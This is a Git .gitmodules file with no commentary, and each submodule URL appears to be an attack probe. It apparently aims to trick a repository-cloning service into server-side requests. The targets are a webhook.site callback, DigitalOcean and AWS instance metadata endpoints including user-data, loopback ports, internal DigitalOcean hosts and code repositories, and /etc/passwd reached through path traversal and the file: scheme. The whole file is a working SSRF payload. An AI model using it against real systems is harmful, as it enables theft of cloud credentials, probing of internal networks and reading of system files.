[submodule "ext-webhook"]
	path = ext-webhook
	url = https://webhook.site/6840c6cb-66f4-42ef-b5e3-38bfbf020c75
[submodule "do-imds"]
	path = do-imds
	url = http://169.254.169.254/metadata/v1/
[submodule "do-imds-id"]
	path = do-imds-id
	url = http://169.254.169.254/metadata/v1/id
[submodule "do-imds-userdata"]
	path = do-imds-userdata
	url = http://169.254.169.254/metadata/v1/user-data
[submodule "aws-imds"]
	path = aws-imds
	url = http://169.254.169.254/latest/meta-data/
[submodule "loopback-80"]
	path = loopback-80
	url = http://127.0.0.1:80/
[submodule "loopback-8080"]
	path = loopback-8080
	url = http://127.0.0.1:8080/
[submodule "loopback-22"]
	path = loopback-22
	url = http://127.0.0.1:22/
[submodule "internal-s2r1"]
	path = internal-s2r1
	url = http://cloud.s2r1.internal.digitalocean.com/
[submodule "internal-localdev"]
	path = internal-localdev
	url = http://localdev.internal.digitalocean.com:9000/
[submodule "internal-spaces"]
	path = internal-spaces
	url = http://cims-stage2.s2r1.spaces.stage2gateway.com/
[submodule "gh-internal-cthulhu"]
	path = gh-internal-cthulhu
	url = https://github.internal.digitalocean.com/digitalocean/cthulhu.git
[submodule "gh-internal-dographql"]
	path = gh-internal-dographql
	url = https://github.internal.digitalocean.com/digitalocean/dographql.git
[submodule "gh-internal-walrus"]
	path = gh-internal-walrus
	url = https://github.internal.digitalocean.com/digitalocean/walrus.git
[submodule "gh-internal-aurora"]
	path = gh-internal-aurora
	url = https://github.internal.digitalocean.com/digitalocean/aurora.git
[submodule "gh-internal-genai-kb"]
	path = gh-internal-genai-kb
	url = https://github.internal.digitalocean.com/digitalocean/genai-knowledge-base-indexer.git
[submodule "gitlab-internal"]
	path = gitlab-internal
	url = https://gitlab.internal.digitalocean.com/digitalocean/cthulhu.git
[submodule "git-internal"]
	path = git-internal
	url = https://git.internal.digitalocean.com/digitalocean/cthulhu.git
[submodule "gerrit-internal"]
	path = gerrit-internal
	url = https://gerrit.internal.digitalocean.com/digitalocean/cthulhu.git
[submodule "relative-traversal"]
	path = relative-traversal
	url = ../../../etc/passwd
[submodule "file-scheme"]
	path = file-scheme
	url = file:///etc/passwd
